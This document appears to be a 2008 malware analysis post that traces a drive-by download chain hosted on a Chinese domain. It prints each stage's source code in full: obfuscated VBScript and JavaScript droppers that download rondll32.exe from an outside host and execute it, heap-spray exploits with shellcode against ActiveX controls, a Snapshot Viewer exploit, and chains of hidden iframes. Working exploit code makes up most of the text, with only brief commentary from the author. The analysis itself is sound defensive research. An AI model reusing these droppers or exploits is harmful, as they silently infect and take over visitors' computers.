*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 16 September 2008
Time: 02:21:49:21
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


This script is detected by AntiVir as JS/Dldr.IFrame.CR

You'll also notice that it grabs new.htm from the same domain, this is detected as HTML/IFrame.UX, and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 9
Date: 16 September 2008
Time: 02:23:51:23
*****************************************************************
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>

<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2094465.js"></script>


Oh dear, this is getting a little messy isn't it?. Lets see what this does shall we.

http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605

This is a counter that presumably, tells them how many times the script has been loaded.

http://www0.douhunqn.cn/csrss/06014.htm

This is the HTML/Rce.Gen infection, and gives us a lovely little executable called rondll32.exe (19.8KB), lovingly downloaded from ppexe.com (Ref: hpHosts Listing);

http://www.ppexe.com/csrss/rondll32.exe

It's downloaded via XMLHTTP and installed via the FileSystemObject (part of the Microsoft Scripting Runtime). For some peculiar reason, my attempts to download rondll32.exe failed (the download kept timing out).

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/06014.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 6
iFrames: 0
Date: 16 September 2008
Time: 02:31:35:31
*****************************************************************
<script language=VBScript>
On Error Resume Next
gameee = "http://www.ppexe.com/csrss/rondll32.exe"
Set gameee_2_cn = document.createElement("object")
gameeeid="clsid:"
gameeeidx="BD"
gameeeid2="96"
gameeeid3="C5"
gameeeid4="56-6"
gameeeid5="5A"
gameeeid6="3-1"
gameeeid7="1D"
gameeeid8="0-98"
gameeeid9="3A-0"
gameeeid10="0C0"
gameeeid11="4FC"
gameeeid12="29E"
gameeeid13="36"
dadong="classid"
gameee3="Micro"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee6="E"
gameee7="T"
gameee_2_cn.SetAttribute dadong, gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeid13
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="Gameeeeeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456sssx="b.stream"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovegameee.ResponseBody
</script>
<script language="JavaScript">
chilams["Savetofile"](gameee_kiteggggggggg,2);
</script>
<script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Love_gameee.run ("""&gameee_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile gameee_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
cute_qq_cn_qq_123456.ShellExeCute gameee_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


http://www0.douhunqn.cn/csrss/flash.htm

This is detected as HEUR/HTML.Malware and loads yet more iFrames;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/flash.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 2
Date: 16 September 2008
Time: 02:45:17:45
*****************************************************************
<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
var yt2="play=Yes";
var yt3="path=/";
var yt4="expires=";
var yt1=yt2+yt3+yt4;
document.cookie=yt1+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{

document.write("<iframe src=i1.html width=100 height=0></iframe>");
document.write("");
}


else{
document.write("<iframe src=f2.html width=100 height=0></iframe>");
document.write("");
}
}
</script>
</html>


i1.html, detected as JS/Dldr.Agent.CQ shows it's loading several SWF (flash) files, I've not checked these yet;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/i1.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 0
Date: 16 September 2008
Time: 02:47:38:47
*****************************************************************
<Script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "DZ";
var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</ScripT>


f2.html, detected as HS/Dldr.Agent.QI seems to do the same;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/f2.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:52:33:52
*****************************************************************
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==64){
var fuckavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==47){
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>


http://www0.douhunqn.cn/csrss/net.htm

This is a rather nice little file, that according to it's title, is a Visual Studio 0day exploit;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/net.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:54:25:54
*****************************************************************
<html>
<title>ÓêÌï Microsoft Visual Studio 0day Exploit!</title>
<script language="JavaScript">

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++)
{
buf1=buf1+unescape("%0c");
}

var Evilcutecode = unescape("%u56E8%u0000%u5300%u5655%u8B57%u246C%u8B18%u3C45%u548B" +
"%u7805%uEA01%u4A8B%u8B18%u205A%uEB01%u32E3%u8B49%u8B34" +
"%uEE01%uFF31%u31FC%uACC0%uE038%u0774%uCFC1%u010D%uEBC7" +
"%u3BF2%u247C%u7514%u8BE1%u245A%uEB01%u8B66%u4B0C%u5A8B" +
"%u011C%u8BEB%u8B04%uE801%u02EB%uC031%u5E5F%u5B5D%u08C2" +
"%u5E00%u306A%u6459%u198B%u5B8B%u8B0C%u1C5B%u1B8B%u5B8B" +
"%u5308%u8E68%u0E4E%uFFEC%u89D6%u53C7%u8E68%u0E4E%uFFEC" +
"%uEBD6%u5A50%uFF52%u89D0%u52C2%u5352%uAA68%u0DFC%uFF7C" +
"%u5AD6%u4DEB%u5159%uFF52%uEBD0%u5A72%u5BEB%u6A59%u6A00" +
"%u5100%u6A52%uFF00%u53D0%uA068%uC9D5%uFF4D%u5AD6%uFF52" +
"%u53D0%u9868%u8AFE%uFF0E%uEBD6%u5944%u006A%uFF51%u53D0" +
"%u7E68%uE2D8%uFF73%u6AD6%uFF00%uE8D0%uFFAB%uFFFF%u7275" +
"%u6D6C%u6E6F%u642E%u6C6C%uE800%uFFAE%uFFFF%u5255%u444C" +
"%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800%uFFA0" +
"%uFFFF%u2E2E%u005C%uB7E8%uFFFF%u2EFF%u5C2E%uE800%uFF89" +
"%uFFFF%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000");

var evilcuteSize = (Evilcutecode.length * 2);

var CutespraySled = unescape("%u9090"+"%u9090");

var CuteAddress = 0x0c0c0c0c;

var CuteBlockSize = 0x100000;

var spraySledSize = CuteBlockSize - (evilcuteSize + 1);

var CuteheapBlocks = (CuteAddress+CuteBlockSize)/CuteBlockSize;

var x = new window["Array"]();

while (CutespraySled.length*2<spraySledSize)
{
CutespraySled += CutespraySled;
}

CutespraySled = CutespraySled.substring(0,spraySledSize/2);

for (i=0;i<CuteheapBlocks;i++)
{
x[i] = CutespraySled + Evilcutecode;
}

document.write(body+buf1+body1);

</script>
</html>


Malzilla had this to say about the u% escaped code;



http://www0.douhunqn.cn/csrss/ff.htm

Alas they really want you to have the executable from ppexe.com, as shown by the following, detected as EXP/SnapshotViewe.B

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/ff.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:00:02:00
*****************************************************************
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var yt1="snpvw.Snapshot Viewer Control.1";
var objlcx = new ActiveXObject(yt1);

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.ppexe.com/csrss/rondll32.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>


http://www0.douhunqn.cn/csrss/tr.htm

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/tr.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 4
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:03:17:03
*****************************************************************
<iframe src=http://www.lukclick.com/search/51777.htm width=100 height=0></iframe>
<iframe src=http://www.letusearch.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.onegameplace.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.kkexe.com/key.htm width=100 height=0></iframe>


Yeesh!, they really want to give us as much as possible don't they?

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.lukclick.com/search/51777.htm

Server IP: 208.53.147.195 [ . ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 2

iFrames: 7

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:05:58:05

*****************************************************************

<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> ads </title>
</head>

<body>


<IFRAME src=http://www.afeisearch.com/portal.php?r=0&username=awei width=0 height=0></IFRAME>

<iframe src="http://www.u2clicks.com/portal.php?r=0&username=jiajia" width="0" height="0" name="cpm"></iframe>

<iframe src="http://www.values7.com/banners/view_ad.php?username=mhv88&format=1" style="border:none" name="advertising" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="31" width="88"></iframe>

<IFRAME src="http://www.kikclicks.com/engine/?ref=beibei" width=1 height=1></IFRAME>

<iframe width="0" height="0" src="http://www.lukclick.com/search/luckymouse.htm"></iframe>

<iframe width="0" height="0" src="http://www.lukclick.com/search/18889.htm"></iframe>

<iframe width=468 height=60 src='http://www.advpoints.com/promote15.php?uid=8918' frameborder=0 marginwidth=0 marginheight=0 vspace=1 hspace=1 allowtransparency=true scrolling=no></iframe>

</body>

<script src='http://goako.com/accounts_js_feed_wizard_display_results.php?idUser=3&username=test&keywords=work at home&adult_filter=off&results_number=10&results_display_style=vertical'></script>

<script src='http://s90.cnzz.com/stat.php?id=1033093&web_id=1033093&online=1&show=line' language='JavaScript' charset='gb2312'></script>

</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.letusearch.com/xiaoke.htm
Server IP: 74.52.24.59 [ mail.wtowww.com ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:10:10:10
*****************************************************************
<iframe src=http://www.letusearch.com/search/d.php?aff=xiaoke width=0 height=0></iframe>


*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.onegameplace.com/xiaoke.htm

Server IP: 65.110.63.170 [ 65-110-63-170.static.sagonet.net ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 4

iFrames: 1

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:11:24:11

*****************************************************************

<HTML>
<HEAD><TITLE>OneGameplace</TITLE>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
</HEAD>
<BODY>
<iframe src=http://www.7scv.com/search/portal.php?username=xiaoke width='0' height='0' frameborder='0'></iframe>
<A href="http://www.51-search.com/search.php?query=Free+Games" target=_blank>Free Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Flash+Games" target=_blank>Flash Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Arcade+Games" target=_blank>Arcade Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Play+Online" target=_blank>Play Online</A> </LI></UL>
<H3><A
href="http://www.51-search.com/search.php?query=Free+Online+Games" target=_blank>Free Online Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Addicting+Games" target=_blank>Addicting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Free+Fun" target=_blank>Free Fun</A>
<LI><A href="http://www.51-search.com/search.php?query=Sports+Games" target=_blank>Sports Games</A> </LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Action+Games" target=_blank>Action Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Adventure+Games" target=_blank>Adventure Games</A>

<LI><A href="http://www.51-search.com/search.php?query=Puzzle+Games" target=_blank>Puzzle Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Skills+Games" target=_blank>Skills Games</A>
</LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Shooting+Games" target=_blank>Shooting Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Fighting+Games" target=_blank>Fighting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Work+at+Home" target=_blank>Work at Home</A>
<LI><A href="http://www.51-search.com/search.php?query=RPG+Games" target=_blank>RPG Games</A> </LI></UL></DIV><!-- dir left end --><!-- dir mid box -->

<DIV id=FT>© 2007-2008 OneGamePlace
</DIV>
</DIV><!-- footer end --></DIV></DIV></DIV></DIV><!-- main container end -->
<table border = "0">
<tr>

<td>

</td>


</tr>
</table>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=kkology">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
<script type="text/javascript"><!--
var EXlogin='kkology' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
navigator.javaEnabled()==1?EXjv="y":EXjv="n";
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=kkology&j=n&jv=n" />
</div></noscript></div>
<script language="javascript" type="text/javascript">

window.status="Done"

</script>
</body>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.kkexe.com/key.htm
Server IP: 125.91.13.147 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:13:35:13
*****************************************************************
<iframe src="http://www.bbcseek.com/seo.php?ref=itxiaoke" width="780" height="700" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>


http://www0.douhunqn.cn/csrss/real11.htm

This is detected as HTML/Shellcode.Gen and contains;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/real11.htm

Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 1

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:18:26:18

*****************************************************************

<SCRIPT language="javascript">

Hello="Hi";

var tcsafeobj="o"+"b"+"j"+"e"+"c"+"t";

tcsafe=document.createElement(tcsafeobj);

var tcsafeid="clsid:2F542A2E-EDC9-4B";

var tcsafeids="F7-8CB1-87C9919F7F93";

var tcsafeidx=tcsafeid+tcsafeids;

tcsafe["setAttribute"]("classid", tcsafeidx);

var tcsafe_ulr="%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000";

var yt1="%uffff%ua164%u0030%u0000%u408b";

var yt2="%u6856%u4e8e%uec0e%ua3e8%u0000";

var yt3="%u8900%u1445%ue0bb%u020f%u8900";

var yt4="%u0544%u652c%u0000%u5600%u8d56";

var yt5="%u0320%u33f3%u49c9%uad41%uc303";

var yt6="%u5e00%u80bf%u020c%ub900%u0100";

var yt7="%u0c47%u6165%u0070%u5057%u55ff";

var yt8="%u1055%u06c7%u0c80%u0002%uc481";

var tcsafecode = window["unescape"]("%u90"+"90"+"%u90"+"90"+"%u90"+"90"+

"%u6090"+"%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+

"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+yt1+"%u8b0c"+

"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+

"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+

"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+yt2+"%u8900"+

"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+

"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+

"%u6856"+"%u84e7%ub469%u6be8%u0000"+yt3+"%u3303"+

"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+

"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+

"%uc71c"+"%u0544%u5c28%u652e%uc778"+yt4+"%u287d"+

"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+

"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+

"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+yt5+"%u3356"+

"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+

"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+

"%u595b"+"%uc25d%u0008%u92e9%u0000"+yt6+"%u0000"+

"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+

"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+

"%u636f"+"%u47c7%u6108%u6574%uc748"+yt7+"%u8b08"+

"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+

"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+

"%u348d"+"%u5508%u406a%u046a%uff56"+yt8+"%u0100"+

"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+

"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+

"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+

"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+

"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+

"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+tcsafe_ulr);



var bigblock = unescape("%u0C0C" + "%u0C0C");

var headersize = 20;

var slackspace = headersize + tcsafecode.length;

while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock["substring"](0,bigblock.length - slackspace);

while (block.length + slackspace < 0x40000) block = block + block + fillblock;



var memory = new window["Array"]();

var tcsafes = memory;

for (i = 0; i < 400; i++)

{

tcsafes[i] = block + tcsafecode

}



var buf = '';

while (buf.length < 32) buf = buf + unescape("%0C");



var m = '';



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;



m = tcsafe.Console;

tcsafe.Console = buf;

tcsafe.Console = m;

</script>


Once again, this downloads rondll32.exe

http://www0.douhunqn.cn/csrss/lzx.htm
http://www0.douhunqn.cn/csrss/real10.htm
http://www0.douhunqn.cn/csrss/Bfyy.htm


All 3 of these seem to return what looks like a 404, but I can't read a bleedin word, so am not 100% sure;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/Bfyy.htm

